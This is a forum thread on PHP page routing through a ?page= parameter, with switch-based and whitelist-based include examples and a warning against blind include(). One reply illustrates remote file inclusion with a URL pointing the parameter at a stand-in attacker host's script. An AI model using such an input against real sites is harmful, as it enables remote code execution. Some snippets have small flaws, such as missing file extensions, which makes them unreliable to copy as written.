Simple PHP question -- unsure of the exact name

[careym1989]

Hello again, everyone!

 

How would I create pages off of a php file, such as this:

 

browse.php?page=home or issues.php?browse=foreignpolicy

 

instead of foreignpolicy.php or publicservice.php

 

Clearly I could just make independent pages but I feel that this would be easier to access for a lot of people.

 

How would I do this or where could I find a tutorial?

 

Help would be appreciated.

 

Regards,

Carey

[DarkWater]

Well, any parameters in the URL can be found in the $_GET superglobal.  For example, if you had browse.php?page=home, $_GET['page'] would be home.  You can probably figure out where to go from there.  Oh, one bit of advice.  If you're going to just be including files based on a GET parameter, make sure you use a whitelist and don't blindly include() files.

[careym1989]

Sorry, like I've said before, I'm not trying to get on anyone's nerves but I'm pretty noob at PHP. I can plug and chug but I don't know where to start with that.

 

Thanks for a speedy response, though!

 

-Carey

[DarkWater]

Sorry, like I've said before, I'm not trying to get on anyone's nerves but I'm pretty noob at PHP. I can plug and chug but I don't know where to start with that.

 

Thanks for a speedy response, though!

 

-Carey

 

Lol, no problem.  Any idea of how you'd like to store the pages?

[Garethp]

<?php

 

$Page = mysql_escape_string($_GET['page']);

 

switch ($Page)

{

case "home":

include "home.php";

break;

 

case "contact";

include "contact.php";

break;

 

case "logout";

include "logout.php";

break;

 

default:

include "index.php";

break;

}

 

?>

[DarkWater]

That'd get really unwieldy really quickly.  Also, you can't use mysql_real_escape_string() unless you're connected to a database...why in the world would you even use it there?  You could do something like:

 

<?php
$whitelist = array('home', 'contact', 'aboutus', 'somepage', 'index');
if (in_array($_GET['page'], $whitelist)) {
    include("../includes/{$_GET['page']}");
}
else {
    include("../includes/index.php");
}
?>

 

I assumed that ../includes would be out of the web root so that no one could get at the files directly, but it doesn't matter.

[careym1989]

That first example worked. I'm intrigued about the whitelist string though -- what are the benefits?

 

FYI my server runs PHP 4.x

[DarkWater]

Less writing.

[CroNiX]

That first example worked. I'm intrigued about the whitelist string though -- what are the benefits?

 

FYI my server runs PHP 4.x

So some hacker fool can't get on your page and start entering in their own stuff into your url variables.  Like 'http://www.yoursite.com?page=http://hackersite.com/evilscript.txt', which could execute the contents of evilscript.txt on your server doing whatever the script says.  Since your script is telling PHP to open whatever file is in the url variable, thats what it will do.  Thats just one example.  Always screen/validate any input that the user can access, that mainly being your URL variables passed via POST/GET/COOKIE.

[Garethp]

Each of our examples has a downside. My example means you have to write a couple more lines of code each time you want to add a page. The other example has the downside of not being able to have ?page=boo redirect to login or ?page=contact redirect to mail.php